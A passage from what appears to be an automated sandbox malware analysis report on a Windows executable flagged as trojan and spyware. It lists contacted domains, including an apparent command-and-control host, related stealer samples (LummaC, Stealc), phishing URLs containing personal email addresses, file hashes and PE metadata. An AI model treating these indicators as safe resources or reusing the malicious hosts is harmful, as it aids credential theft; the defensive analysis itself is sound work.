                                                                                                                                                        high
                                                                                                                                                        https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.netmG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://cdn.cookielaw.org/mG83m82qhF.exe, 00000000.00000003.1609775563.00000000052A4000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2005523294.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2008127945.00000000052A6000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609568689.000000000529F000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://crt.rootca1.amazontrust.com/rootca1.cer0?mG83m82qhF.exe, 00000000.00000003.1426625628.00000000052B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;mG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://bitbucket.org/b=mG83m82qhF.exe, 00000000.00000003.1630581541.0000000000B1F000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B17000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1630535859.0000000000B17000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2005907847.0000000000B20000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://cuddlyready.xyz/ImG83m82qhF.exe, 00000000.00000003.1372699843.0000000000AAB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    https://cuddlyready.xyz:443/apiyrmG83m82qhF.exe, 00000000.00000003.1556861946.0000000000B0B000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1495608790.0000000000B00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      https://remote-app-switcher.stg-east.frontend.public.atl-paas.netmG83m82qhF.exe, 00000000.00000003.1609775563.00000000052A4000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2005523294.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2008127945.00000000052A6000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609568689.000000000529F000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        https://cuddlyready.xyz/=ImG83m82qhF.exe, 00000000.00000003.1452173526.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1453035473.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1453162697.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1453850480.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1453566886.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1454050433.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1452841763.0000000000B0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=mG83m82qhF.exe, 00000000.00000003.1375336734.0000000005248000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375131190.000000000524B000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375217920.0000000005248000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://bbuseruploads.s3.amazonaws.com/mG83m82qhF.exe, 00000000.00000003.1630581541.0000000000B1F000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B17000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1630535859.0000000000B17000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2005907847.0000000000B20000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                              • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
52.217.136.89 | s3-w.us-east-1.amazonaws.com | United States | 16509 | AMAZON-02US | false
172.67.150.173 | cuddlyready.xyz | United States | 13335 | CLOUDFLARENETUS | false
185.166.143.49 | bitbucket.org | Germany | 16509 | AMAZON-02US | false
                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                              Analysis ID:1579750
                                                                                                                                                                              Start date and time:2024-12-23 08:30:26 +01:00
                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                              Overall analysis duration:0h 6m 17s
                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                              Report type:full
                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                              Number of analysed new started processes analysed:10
                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                              Technologies:
                                                                                                                                                                              • HCA enabled
                                                                                                                                                                              • EGA enabled
                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                              Sample name:mG83m82qhF.exe
                                                                                                                                                                              renamed because original name is a hash value
                                                                                                                                                                              Original Sample Name:b51d856b18ecfad7b127881f7819409b.exe
                                                                                                                                                                              Detection:MAL
                                                                                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@2/5@3/3
                                                                                                                                                                              EGA Information:Failed
                                                                                                                                                                              HCA Information:
                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                              • Number of executed functions: 0
                                                                                                                                                                              • Number of non-executed functions: 0
                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 13.89.179.12, 13.107.246.63, 4.175.87.197, 40.126.53.19
                                                                                                                                                                              • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                              • Execution Graph export aborted for target mG83m82qhF.exe, PID 7704 because there are no executed function
                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                              • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
02:31:24 | API Interceptor | 33x Sleep call for process: mG83m82qhF.exe modified
02:32:28 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                              • artemis-rat.comartemis-rat.com:443
                                                                                                                                                                              Payment Invoice.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                              • artemis-rat.comartemis-rat.com:443
                                                                                                                                                                              185.166.143.49http://jasonj002.bitbucket.io/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              • jasonj002.bitbucket.io/
                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                              s3-w.us-east-1.amazonaws.comLP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 16.182.101.249
                                                                                                                                                                              zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 52.217.67.100
                                                                                                                                                                              Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 52.217.18.140
                                                                                                                                                                              5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 52.217.203.57
                                                                                                                                                                              TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 3.5.16.86
                                                                                                                                                                              uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                              • 16.182.37.145
                                                                                                                                                                              EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 52.216.41.233
                                                                                                                                                                              https://cv01zl.s3.amazonaws.com/index.html?AWSAccessKeyId=AKIAWPPO57XS4BTHJAEO&Signature=bBChlGCf3qnCt%2B4WchKJjXtb09k%3D&Expires=1734874865#stewart.thomas@cambridgeshire.gov.ukGet hashmaliciousFake CaptchaBrowse
                                                                                                                                                                              • 52.217.128.241
                                                                                                                                                                              https://ho8d1o.s3.amazonaws.com/index.html?AWSAccessKeyId=AKIAWPPO57XS4BTHJAEO&Signature=h4n%2BY6bT0YHF44DbJkmJeHwDnn0%3D&Expires=1734860434#mandy.pullen@peterborough.gov.ukGet hashmaliciousFake CaptchaBrowse
                                                                                                                                                                              • 52.216.142.68
                                                                                                                                                                              https://preview.micrasoft-office365.com/f5c275dd184cbe62?l=6Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 54.231.135.57
                                                                                                                                                                              bitbucket.orgLP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 185.166.143.49
                                                                                                                                                                              zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 185.166.143.48
                                                                                                                                                                              Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 185.166.143.50
                                                                                                                                                                              5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 185.166.143.49
                                                                                                                                                                              TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 185.166.143.49
                                                                                                                                                                              uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                              • 185.166.143.48
                                                                                                                                                                              EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 185.166.143.49
                                                                                                                                                                              F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                                              • 185.166.143.48
                                                                                                                                                                              D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                                              • 185.166.143.49
                                                                                                                                                                              credit.jsGet hashmaliciousPureLog Stealer, RHADAMANTHYSBrowse
                                                                                                                                                                              • 185.166.143.48
                                                                                                                                                                              cuddlyready.xyzpfY4k1qisn.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                              • 172.67.150.173
                                                                                                                                                                              LP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 104.21.32.96
                                                                                                                                                                              0OkLsJL2Bn.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                              • 172.67.150.173
                                                                                                                                                                              Wave-Executor.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 193.143.1.9
                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                              CLOUDFLARENETUSpfY4k1qisn.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                              • 172.67.150.173
                                                                                                                                                                              LP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 104.21.32.96
                                                                                                                                                                              0OkLsJL2Bn.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                              • 172.67.150.173
                                                                                                                                                                              zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 104.21.36.201
                                                                                                                                                                              0HdDuWzp54.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                              • 172.67.199.72
                                                                                                                                                                              Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 104.21.36.201
                                                                                                                                                                              NE4jxHLxXJ.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                              • 172.67.199.72
                                                                                                                                                                              U8mbM8r793.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                              • 172.67.199.72
                                                                                                                                                                              ABnDy7rLFS.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                              • 104.21.36.201
                                                                                                                                                                              skIYOAOzvU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 104.21.36.201
                                                                                                                                                                              AMAZON-02USLP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 185.166.143.49
                                                                                                                                                                              zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 52.217.67.100
                                                                                                                                                                              Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 52.217.18.140
                                                                                                                                                                              armv6l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 54.203.164.5
                                                                                                                                                                              5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 52.217.203.57
                                                                                                                                                                              TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 185.166.143.49
                                                                                                                                                                              uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                              • 185.166.143.48
                                                                                                                                                                              EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 185.166.143.49
                                                                                                                                                                              mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 54.171.230.55
                                                                                                                                                                              trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                              • 108.139.47.92
                                                                                                                                                                              AMAZON-02USLP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 185.166.143.49
                                                                                                                                                                              zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 52.217.67.100
                                                                                                                                                                              Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 52.217.18.140
                                                                                                                                                                              armv6l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 54.203.164.5
                                                                                                                                                                              5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 52.217.203.57
                                                                                                                                                                              TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 185.166.143.49
                                                                                                                                                                              uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                              • 185.166.143.48
                                                                                                                                                                              EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 185.166.143.49
                                                                                                                                                                              mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 54.171.230.55
                                                                                                                                                                              trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                              • 108.139.47.92
                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                              a0e9f5d64349fb13191bc781f81f42e1pfY4k1qisn.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                              • 172.67.150.173
                                                                                                                                                                              • 52.217.136.89
                                                                                                                                                                              • 185.166.143.49
                                                                                                                                                                              LP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 172.67.150.173
                                                                                                                                                                              • 52.217.136.89
                                                                                                                                                                              • 185.166.143.49
                                                                                                                                                                              0OkLsJL2Bn.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                              • 172.67.150.173
                                                                                                                                                                              • 52.217.136.89
                                                                                                                                                                              • 185.166.143.49
                                                                                                                                                                              zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 172.67.150.173
                                                                                                                                                                              • 52.217.136.89
                                                                                                                                                                              • 185.166.143.49
                                                                                                                                                                              No context
                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                              Entropy (8bit):1.0430225787012481
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:96:SeFLMzc3uhschroI7JfpQXIDcQvc6QcEVcw3cE/n+HbHg/8BRTf3Oy1oVazW0EVO:F+Jhk0BU/gjudxQfzuiFEZ24IO8+
                                                                                                                                                                              MD5:BAA001319F4A3E642941D9E1BB28BF53
                                                                                                                                                                              SHA1:59726B305D5A5B35FFA5161DDACE9D7ACD2F091D
                                                                                                                                                                              SHA-256:AAB0936365656838CE04D320331E712EE4DA113EF5C8A0A4BA9663159CEE76E3
                                                                                                                                                                              SHA-512:64DD0D4AD4F54B838D4EC3A4DC4DDDEC9FCF2A7F470A885D9E8841A2E279F3F4F80CEF430DFD495E4F758126A427506F099F3E87D25929303868C33783ABF1CA
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:low
Preview:Version=1..EventType=APPCRASH..EventTime=133794127127123138..ReportType=2..Consent=1..UploadTime=133794127134466953..ReportStatus=524384..ReportIdentifier=736a0626-81e0-46f5-8ae8-ff13b70650cc..IntegratorReportIdentifier=fcfed926-1e08-4f25-9c62-9c3de30b44d6..Wow64Host=34404..Wow64Guest=332..NsAppName=mG83m82qhF.exe..AppSessionGuid=00001e18-0001-0013-01da-67a80c55db01..TargetAppId=W:00068ef7d0b749686563d557f5ef137e91ce0000ffff!000061365a9f474ed89cc6bcc45bd08355a381cacb85!mG83m82qhF.exe..TargetApp
                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              File Type:Mini DuMP crash report, 15 streams, Mon Dec 23 07:31:52 2024, 0x1205a4 type
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):289986
                                                                                                                                                                              Entropy (8bit):1.471476629474298
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:768:Cem6SBBtHTQ7T3KI37Lz2DGJbObGT2Jgr0Lh49sKUE4X:Cem5ET3Tb9Qbi1ILh49V74X
                                                                                                                                                                              MD5:34F8354A8F01E00B91F24F008C161548
                                                                                                                                                                              SHA1:BEABFC719792E5C81853841EDDA38AE5DF8B9158
                                                                                                                                                                              SHA-256:43B73ABCC8DC61E0EFA59B2335D10387D60773C442A53BB318A4CFD73D013C61
                                                                                                                                                                              SHA-512:4CD02F1DEFB844BE486DB3D13B1B4075B1708BCBEC39BCA8BB549EF978F0EDF619701FF1CFD90E897B6EAA659AAAD2CE49629C1DA7BCA2AB0E1C924FFA44734E
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):8382
                                                                                                                                                                              Entropy (8bit):3.7047535707795483
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:192:R6l7wVeJyBe696YWSSUhZgmfceXgpry89b/60Asf31m:R6lXJ9696YTSUhZgmfceG/60Tfo
                                                                                                                                                                              MD5:E179AF95FE08A4DC6367E43DC44BD91F
                                                                                                                                                                              SHA1:4DB87EC2103EC7F5BA346BF6956CC5D90B90C90A
                                                                                                                                                                              SHA-256:E091C481EA6461738EE815070EA27104C5679452D0A83C3824EC7D2C8428F6A4
                                                                                                                                                                              SHA-512:5D6E423E0D5CAC7CE3196B9C1DF1EC837CDA6D87A36B6A0026CB943710E73F58C2E1122389A62089278618D47857A4292CB4AE8C1E893C45A823996F487892FE
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>.. <OSVersionInformation>.. <WindowsNTVersion>10.0</WindowsNTVersion>.. <Build>19045</Build>.. <Product>(0x30): Windows 10 Pro</Product>.. <Edition>Professional</Edition>.. <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>.. <Revision>2006</Revision>.. <Flavor>Multiprocessor Free</Flavor>.. <Architecture>X64</Architecture>.. <LCID>2057</LCID>.. </OSVersionInformation>.. <ProcessInformation>.. <Pid>7704</Pi
                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):4624
                                                                                                                                                                              Entropy (8bit):4.498352846466672
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:cvIwWl8zsnVJg77aI9MPWpW8VYSYm8M4JpKcFvG+q896LsuzS2d:uIjfnvI76e7ViJrGFsuzS2d
                                                                                                                                                                              MD5:51D92F8F419A98ABF4E6139BA6FBBF4E
                                                                                                                                                                              SHA1:7917694D246653D6E31C685F3F51681AF42A7B18
                                                                                                                                                                              SHA-256:7A90A923DBEBEB2A4EAB8ABD6C3EB4F9625B4B534331D6A92158EB6935FDC0AE
                                                                                                                                                                              SHA-512:22086BE38AC8BB39E5FA61B557B9B8B5E82493044104D1193F111F2F3F6F96B9FB5FC3D89FFB95AB41EACE380341FF951C82444626F2B44FDE6AB00D46B2238B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="643594" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1835008
                                                                                                                                                                              Entropy (8bit):4.295989553156402
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6144:L41fWRYkg7Di2vXoy00lWZgiWaaKxC44Q0NbuDs+z6mBMZJh1Vji:k1/YCW2AoQ0NiV6wMHrVm
                                                                                                                                                                              MD5:16840C8B58F18F28414D87194B557430
                                                                                                                                                                              SHA1:28CC03F0340B02CF054CB065675F2150B46171FB
                                                                                                                                                                              SHA-256:EFF828AB9CAA7C4C1A61D0E3B0A260A0D7D1EF969296D5313B39E804DC46E11C
                                                                                                                                                                              SHA-512:8B1559D7B27D3DB71CD5419B42E36B1D5871C440C20837029D8F634F54EEF8562EC3E13B7C218624D11BAE33F50A2A77E056E036AFBE1A0C3A88AAD068A2810B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Entropy (8bit):6.5553655953166485
                                                                                                                                                                              TrID:
                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                              File name:mG83m82qhF.exe
                                                                                                                                                                              File size:2'982'400 bytes
                                                                                                                                                                              MD5:b51d856b18ecfad7b127881f7819409b
                                                                                                                                                                              SHA1:61365a9f474ed89cc6bcc45bd08355a381cacb85
                                                                                                                                                                              SHA256:663a74437e86b0bf7008ac4438821bf6c2adc65abf946b81014649a2fc23d294
                                                                                                                                                                              SHA512:ffb1229f3ccbba3c95636a2be637b5bd71fc0a74dcd2bc4f5d6a64b34d20bfbe11fa6430105c2f4bd1ba4227094b0e866a3d06ec002dda9dc8ddba6eefc67471
                                                                                                                                                                              SSDEEP:49152:NFkZEUNMWcDPeBPuD5JL9XAuo0QsREgddD/ZF1Qj6CIXl66pjUNqn3RAqU:TkEUNVcDPeBPuD5JRRom0FIXk6d53N
                                                                                                                                                                              TLSH:ACD52AE2B50962CFD08E16F89427ED826D5D43BD8B2549C79C2C747A6E7BCC021F6C29
                                                                                                                                                                              File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g.............................`0...........@...........................0...........@.................................T0..h..
                                                                                                                                                                              Icon Hash:90cececece8e8eb0
                                                                                                                                                                              Entrypoint:0x706000
                                                                                                                                                                              Entrypoint Section:.taggant
                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                              Time Stamp:0x675F3CD1 [Sun Dec 15 20:32:17 2024 UTC]
                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                              OS Version Major:6
                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                              File Version Major:6
                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                              Subsystem Version Major:6
                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                              Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                              Instruction

| Name | Virtual Address | Virtual Size | Is in Section |
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x53054 | 0x68 | .idata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x531f8 | 0x8 | .idata |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
| | 0x1000 | 0x51000 | 0x24800 | 1be40c9159d050d55534cec456fb1205 | False | 0.997418129280822 | data | 7.981487191884987 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
